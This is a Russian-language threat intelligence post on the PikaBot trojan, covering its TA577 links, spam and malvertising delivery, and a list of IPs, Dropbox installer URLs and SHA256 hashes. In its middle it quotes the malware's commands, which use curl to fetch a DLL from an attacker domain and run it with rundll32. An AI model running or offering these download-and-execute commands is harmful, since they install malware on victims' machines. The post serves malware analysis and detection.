PikaBot Trojan IOCs - Part 7

В последние несколько дней исследователи, в том числе и мы, заметили PikaBot, новое семейство вредоносных программ, появившееся в начале 2023 года, которое распространялось с помощью вредоносной рекламы. Ранее PikaBot распространялся только через спам-кампании, как и QakBot, и стал одной из предпочтительных полезных нагрузок для агента угроз, известного как TA577.

Оглавление

PikaBot Trojan

Впервые PikaBot был идентифицирован как возможный Matanbuchus, распространяемый в рамках вредоносной спам-кампании Unit 42 в феврале 2023 года. Позже имя PikaBot было присвоено TA577 - угрожающему актору, который, по мнению Proofpoint, участвовал в распространении таких полезных нагрузок, как QakBot, IcedID, SystemBC, а также Cobalt Strike. Что еще более важно, TA577 был связан с распространением программ-вымогателей.

Исследователи из Cofense отметили рост числа кампаний по рассылке вредоносного спама, направленных на доставку DarkGate и PikaBot, после ликвидации ботнета QakBot в августе 2023 года. Типичная цепочка распространения PikaBot обычно начинается с электронного письма (перехваченного потока), содержащего ссылку на внешний веб-сайт. Пользователей обманом заставляют загрузить zip-архив, содержащий вредоносный JavaScript.

JavaScript создает произвольную структуру каталогов, в которую извлекает вредоносную полезную нагрузку с внешнего сайта с помощью утилиты curl:

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri &amp; curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

Затем он выполняет paylod (DLL) через rundll32:

rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter

1	rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter

Как описано в OALabs, основной модуль PikaBot внедряется в легитимный процесс SearchProtocolHost.exe. Загрузчик PikaBot также скрывает свою инъекцию, используя косвенные системные вызовы, что делает вредоносную программу очень незаметной.

Кампания нацелена на поиск в Google удаленного приложения AnyDesk. Исследователь безопасности Колин Коуи наблюдал за цепочкой распространения, и впоследствии Оле Вилладсен подтвердил, что полезная нагрузка - это PikaBot.

Indicators of Compromise

IPv4

139.99.222.29
172.232.162.198
172.232.164.77
172.232.186.251
54.37.79.82
57.128.108.132
57.128.109.221
57.128.164.11
57.128.83.129

URLs

dropbox.com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq
dropbox.com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
dropbox.com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

SHA256

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff